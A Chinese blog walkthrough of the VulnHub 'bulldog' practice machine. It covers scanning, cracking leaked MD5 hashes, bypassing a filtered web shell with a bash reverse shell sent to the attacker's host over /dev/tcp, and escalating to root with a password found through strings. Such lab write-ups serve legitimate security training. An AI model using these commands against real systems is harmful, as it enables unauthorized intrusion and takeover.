靶机渗透【bulldog】

已于 2022-01-29 13:25:41 修改
阅读量4.3k 收藏 19
点赞数 3
分类专栏: 靶机渗透 文章标签: 安全 渗透测试 靶机
于 2021-11-04 19:29:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52576844/article/details/121137855
版权

文章目录

一. bulldog靶机安装

1. 下载bulldog

  • 靶场地址:Bulldog - VulnHub (可自行下载)

  • 百度网盘:bulldog
    提取码:qrnf

  • 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下

  • 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置
    在这里插入图片描述

2. 开启bulldog
  • 开启后无需进行其他操作
    在这里插入图片描述

二. bulldog靶机渗透

1. 信息收集

1)主机发现

  • 打开 kali 进入终端,输入 ifconfig 查询本机IP,拿到本机所处网段 192.168.110.0/24

在这里插入图片描述

  • 输入 netdiscover -i eth0 -r 192.168.110.0/24(这里我们直接扫描C段)
    -i:指定网卡设备
    -r:指定扫描网段

在这里插入图片描述

  • 发现目标靶机IP:192.168.110.142

在这里插入图片描述
2)端口扫描

  • 输入 masscan --rate=10000 --ports 0-65535 192.168.110.142,发现目标靶机打开80,8080,23端口
    rate=每秒多少个数据包
    ports 端口范围

在这里插入图片描述

  • 输入 nmap -sV -T4 -O -p 23,80,8080 192.168.110.142 查看端口的详细信息
  • -sV:扫描版本的信息和开启的服务
    -T4:指定扫描过程中使用的时序(分为0-5等级,推荐用4)
    -O:扫描操作系统
    -p:指定端口
  • 也可以选择带-A参数,详细扫描开放端口的具体服务
  • 可以发现目标主机开启了23 (ssh服务) ,80 (http服务) ,8080 (http服务) 端口

在这里插入图片描述
3)子域名扫描

  • 发现目标开启http服务,主机访问192.168.110.142

在这里插入图片描述

  • 输入 dirb http://192.168.110.142 扫描子域名

在这里插入图片描述

  • 得到以下目录:
    http://192.168.110.142/admin/
    http://192.168.110.142/dev/
    http://192.168.110.142/admin/login/
    http://192.168.110.142/dev/shell/
2. Web渗透

1)访问 http://192.168.110.142/admin/,发现需要登录
在这里插入图片描述
2)访问 http://192.168.110.142/dev/,发现可以访问
在这里插入图片描述
3)访问 http://192.168.110.142/dev/shell/,发现不能访问
在这里插入图片描述
4)回到 http://192.168.110.142/dev/,F12或右键查看源代码,发现一一对应的可疑邮箱与疑似哈希密码串,猜测其为用户名及密码

在这里插入图片描述
5)通过解密工具撞哈希值

  • 常用MD5解密网站:
    MD5解密
  • 依次尝试获取到的密码串,发现最后两个解密成功

在这里插入图片描述
在这里插入图片描述
6)回到 http://192.168.110.142/admin/ 尝试登录
在这里插入图片描述

  • 尝试以 nick、sarah 作为用户名,将 bulldog、bulldoglover 作为密码登录,登录成功

在这里插入图片描述

7)发现此时 http://192.168.110.142/dev/shell/ 可以访问,但只能使用列出的命令

在这里插入图片描述
在这里插入图片描述

3. 命令注入&nc反弹shell
  • 由于部分命令被过滤,下面尝试绕过反弹shell

1)回到kali终端,输入 nc -lvp 1234 随便设置一个端口进行监听
在这里插入图片描述
2)在此输入 echo ‘bash -i >& /dev/tcp/192.168.110.140/1234 0>&1’ | bash 尝试反弹

  • 由于 echo 是可以使用的,这里利用 echo 构建一个反弹shell的命令,然后用管道符交给 bash 执行
  • 注意中间 IP 为 kali 的 IP

在这里插入图片描述

  • 运行后发现 kali 监听已接收到反弹 shell

在这里插入图片描述

  • 此时已成功进入系统,但权限还不是root,下一步进行提权操作
4. 提权
  • 切换成 root 用户的前提是需要知道 root 用户的密码,所以我们这里的主要目标是在有限的权限里搜集到 root 的密码,完成提权

1)输入 cat /etc/passwd 查看用户,发现 bulldogadmin 用户
在这里插入图片描述
2)输入 cd . . 切换到 home 目录下
在这里插入图片描述
3)输入 cd bulldogadmin 进入该目录下
在这里插入图片描述
4)输入 ls -al 查看隐藏文件,发现隐藏文件 .hiddenadmindirectory
在这里插入图片描述
5)输入 cd .hiddenadmindirectory 进入该目录,ls -al 查看隐藏文件,发现 customPermissionApp和note两个文件
在这里插入图片描述
6)分别使用 cat 查看,发现没有可用信息
在这里插入图片描述
在这里插入图片描述
7)利用 strings 查看可执行文件中的内容,发现疑似密码

  • strings 命令用来提取和显示非文本文件中的文本字符串

在这里插入图片描述

  • 展开密码串为:SUPERultimatePASSWORDyouCANTget

8)用 Python 调用本地的 shell 实现,输入 python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述
9)输入 sudo su - 进入登录模式,然后输入之前获得的密码串
在这里插入图片描述

  • 提权成功
‍‍‪‍pinkward
关注
  • 3
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【vulnhub】---bulldog靶机
qq_43168364的博客
08-21 259
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、信息收集 主机发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
靶机渗透测试实战(三)——Bulldog1渗透实战
橘子女侠
05-09 3585
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...
渗透项目】Bulldog网站渗透
命运的旋律的博客
12-13 477
Bulldog网站渗透 文章目录Bulldog网站渗透1.渗透思路测试环境测试步骤1.信息收集主机发现端口扫描操作系统扫描2.漏洞探测网站指纹信息扫描目录扫描3.信息利用4.漏洞利用5.权限提升 1.渗透思路 进行信息收集,根据开放的端口以及服务,寻找可行的渗透方法 在未知目标主机的情况下,使用netdiscover主机发现获得主机IP地址 得到主机的IP地址后,使用masscan进行快速的端口...
vulnhub靶场bulldog1
kukudeshuo的博客
08-12 247
vulnhub靶场bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128) 靶机bulldog1(192.168.109.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.157 使用nmap扫描查看目标靶机端口开放
vuInhub靶场实战系列--bulldog-1
最新发布
weixin_45221204的博客
06-03 1193
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 246
这个靶机难度较为简单,可以简单练手
bulldog靶机
ybkj6666的博客
11-04 227
使用arp-scan生成网络接口地址,查看ip。
渗透测试-vulnhub靶机 bulldog
2301_79441074的博客
11-23 41
命令执行漏洞
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1432
Vulnhub-Bulldog靶机实战
bulldog靶机练习思路详解
weixin_45597678的博客
07-09 305
下载靶机,在虚拟机中打开 下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 主机扫描nmap,发现目标主机与其开放的端口 在浏览器打开网站,只发现一只傻不拉几的狗狗 使用burp进行爬虫发现网站下存在一个robots.txt 进行访问没有任何有用的信息 对网站进行目录扫描发现存在admin 浏览admin网页,打开了一个登录页面,但是没用做不了爆破 进入dev目录进行代码审计查看代码上是否用可用信息 发现一些加密之后的密码进行解码之后在
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 990
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
靶机渗透(一)——bulldog2
qq_45751902的博客
04-16 2218
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,并且修改靶机的网络,注意红框,下面能用到 修改完打开就是这样的 三、kali攻击机 打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称) 四、攻击 1.在kali上查看ip ifconfig 发现ip地址为192.1
Vulnhub靶场渗透练习(三) bulldog
weixin_30563917的博客
07-08 193
拿到靶场后先对ip进行扫描 获取ip 和端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架和语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

‍‍‪‍pinkward

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值